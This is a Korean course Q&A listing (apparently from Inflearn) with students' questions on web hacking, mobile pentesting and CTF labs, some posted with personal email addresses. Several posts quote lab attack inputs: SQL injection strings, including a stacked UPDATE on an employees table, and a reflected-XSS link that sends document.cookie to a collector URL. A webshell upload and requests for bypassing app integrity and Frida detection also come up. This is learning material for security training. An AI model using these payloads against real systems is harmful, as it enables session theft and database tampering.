묻고 답해요
169만명의 커뮤니티!! 함께 토론해봐요.
인프런 TOP Writers
-
해결됨해킹 입문부터 중급까지, 한 번에 배우는 웹해킹
4분 25초쯤 limit 1,1 사용한 이유가 궁금합니다.
4분 25초쯤 limit 1,1 사용한 이유가 궁금합니다.
-
해결됨해킹 입문부터 중급까지, 한 번에 배우는 웹해킹
SQl Injetction - DB 플래그 문의
문제 풀고 나온 플래그 입력했는데 틀렸다고 나옵니다
-
미해결반드시 알고 넘어가야 할 웹 기술 기초편
URL 인코딩 (18:25)
pw : cre &#cre(공백부분) 인코딩 %20 으로,userpw=cre%20%26%23 아닌가요? '+'기호는 어느 타입의 상황일 때 %20을 대신하여 사용되는지 궁금합니다 좋은 강의 제공해주셔서 감사합니다
-
미해결해커를 위한 iOS 앱 모의 해킹 전문 과정
강의 추가 계획은 없나요?
안녕하세요 강의 수강 후 실무에서 잘 활용하고 있으나 고민이 있어서 글씁니다.실제 실무에서는 보안솔루션이 설치되어 있고 난독화가 되어 있어서 강의 내용만으로는 루팅탐지나 프리다탐지 등을 우회하여 진단하기가 어렵습니다.그리고 코드 패치 등으로 파일을 변조하면 무결성 탐지를 하기도 하구요. 그래서 질문입니다.중급자를 위한 강의 말고 고급자를 위한 강의도 있었으면 좋겠습니다. 요즘 왠만한 앱들은 거의 다 보안솔루션을 탑재하고 있고 보안 솔루션들은 지금 과정으로는 진단이 거의 안되고 있습니다. 고급반 강의 가능할까요?보안 솔루션 적용된 앱 진단방법무결성 탐지 우회방법난독화 해제방법 등
-
미해결IT보안을 위한 와이어샤크 네트워크 패킷 분석 실전
강의 실습 자료는 어디서 받나요?
실습 강의 자료가 안보이네요...어디서 확인을 해야 할까요?ckdgus5262@gmail.com 메일로 받을 수 있을까요?
-
미해결침투테스트 전문가 - 시스템 편 (모의해킹, 모의침투)
강의 자료 확보
강의에서 보여주는 pdf 파일은 어디서 다운받을 수 있나요?
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
' and 1=2 union select 'test','test',null~~ 검색하면 아무것도 없는 목록이 나와요
실습 동영상처럼 idx=test, title=test인 글이 목록에 떠야 하는데, 목록에 아무 글도 뜨지 않습니다. ㅠㅠ
-
해결됨리눅스 커널 해킹. A부터 Z까지
빌드환경 및 커널소스의 버전
강의에서는 빌드환경 우분투18 및 커널소스 5.8.5 가 사용되었는데 25년 초 기준으로 우분투24 및 커널소스 6.14.7 (stable 기준) 까지 나온 상태입니다. 최근 버전 기준으로 환경을 세팅해도 강의를 진행하는데 문제가 없는지 궁금합니다.
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
파일 업로드 취약점 공격 실습 웹쉘 미작동
파일 업로드 취약점 공격 실습시에 webshell.php 파일을 작성하여 업로드해 시스템명령어를 실행해야하는데Warning: system() [function.system]: Cannot execute a blank command in C:\APM_Setup\htdocs\insecure_website\upload\webshell.php on line 2라는 에러만 뜹니다. 강의자분이랑 코드도 똑같이 작성하고 실습도 차근차근 진행하였는데 계속 오류가 뜹니다.
-
미해결네이버 클라우드 서비스 인프라 구축 이해와 해킹,보안 모니터링
30. VPC 네트워크의 IP 트래픽 정보 (업데이트중)은 언제 업데이트되나요?
해당 강의를 완료할 수 없어 진도율 100%가 안되네요;;
-
미해결모의해킹 실무자가 알려주는, XSS 공격 기법
mysql 환경 변수 설정 마지막 단계
일단 mysql 대신 mariadb가 깔려있어서 해당 상황으로 진행중입니다 강의에서는 DB와 information__schema, mysql, sys 등 깔려있는 게 많은데 mariadb로 들어가보니 깔려있는 게 없네요 그러다보니 다음단계인 XSS가 진행이 안되네요 어떤 추가 설정을 해야할까요?
-
미해결화이트해커가 되기 위한 8가지 웹 해킹 기술
이메일 피싱
안녕하세요. Reflected XSS 이메일 피싱 관련해서 실습 중입니다. 스크립트를 입력폼에 직접 넣어서 실행했을 때에는 access_log에 쿠키값이 잘 떴는데, 이메일로 하려니까 아래 사진처럼 됩니다. 이메일에서 입력한 링크는document.location%3d">http://localhost/dvwa/vulnerabilities/xss_r/?name=<script>document.location%3d'http://localhost/cookie%3f'%2bdocument.cookie</script> 입니다.
-
미해결해킹대회(CTF) 출전을 위한 시스템해킹(Pwnable) 입문
hacktheworld 사이트가 들어가지지 않습니다
hacktheworld 사이트가 들어가지지 않습니다. 문제 실습 파일을 받고 싶은데 어떻게 해야할까요?
-
미해결화이트해커가 되기 위한 8가지 웹 해킹 기술
MySQL Database 실행 오류
안녕하십니까.XAMPP 8.x 버전으로 설치하다가 dvwa가 안되어 5.6 버전을 다시 설치하고 강의를 따라하고 있는데,MySQL Database가 Start를 눌러도 Running이 아니라 다시 Stopped로 돌아갑니다. 오류는 어디서 확인할 수 있으며, 어떻게 해결해야하나요?
-
미해결화이트해커가 되기 위한 8가지 웹 해킹 기술
한글폰트 설치와 관련하여 질문 있습니다.
이렇게 sources.list 파일 수정하였는데, 404 not found 에러가 나서 질문 남깁니다.
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
CSRF 대응방안 궁금 사항 문의
결국에는 공격자가 유도하는 action.php 에 토큰값이 비어있거나, 임의로 요청해도 write.php에서 발급받은 토큰과 일치하지 않아 공격이 실패된 것으로 이해되었습니다.그렇다면 만약에 토큰을 발급받는 페이지인 write.php에서 XSS 가 발생되어 공격자가 토큰값만 알게 된다면 CSRF 취약점이 가능할 까요? 물론 페이로드를 개별 사용자 한명만을 대상으로 토큰값을 요청해야겠지만요
-
미해결안드로이드 모바일 앱 모의해킹과 시큐어코딩
드로저 설치 오류
드로저를 설치했고, 포트 포워딩도 했고, 필요한 라이브러리도 다 다운받았는데요.drozer console connect입력하면 (drozer) C:\Users\juyeon>drozer console connectSelecting 2e2a97ea1be21480 (samsung SM-S9210 9)local variable 'session' referenced before assignment 이렇게 뜹니다.. 어떻게 해결해야 하나요?ㅠ
-
미해결무작정 따라하며 원리를 깨우치는 웹 해킹 : WebGoat 편
학습관련 질문
혹시 이해가 잘 안가는 부분이 있어서 그런데요! 3SL99A';update employees set SALARY=100000 where LAST_NAME='Smith 이렇게 입력하면 구문이 잘 돌아가는걸 알 수 있는데 왜 구지 '가 ;앞에 들어가는지 잘 모르겠습니다.설명 한번만 간략하게라도 부탁드릴게요!! 그리고 저 뒤에 Smith부분에도 왜 뒤에 '가 안붙는지 잘 모르겠습니다
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
php.ini가 아니라 php가 다운됩니다.
제목처럼 php.ini가 아니라 php가 다운됩니다. 또한 강사님께서 공유하신 것을 다운 받으면 바이러스에 감염된다고 경고가 옵니다. 원인을 아신다면 답변해주시면 감사하겠습니다.
-
미해결IT보안을 위한 와이어샤크 네트워크 패킷 분석 실전
강의 실습 자료는 어디서?
강의 실습 자료를 다운받고 싶습니다.관련 URL 링크나 메일로 보내주세요teamksd@naver.com
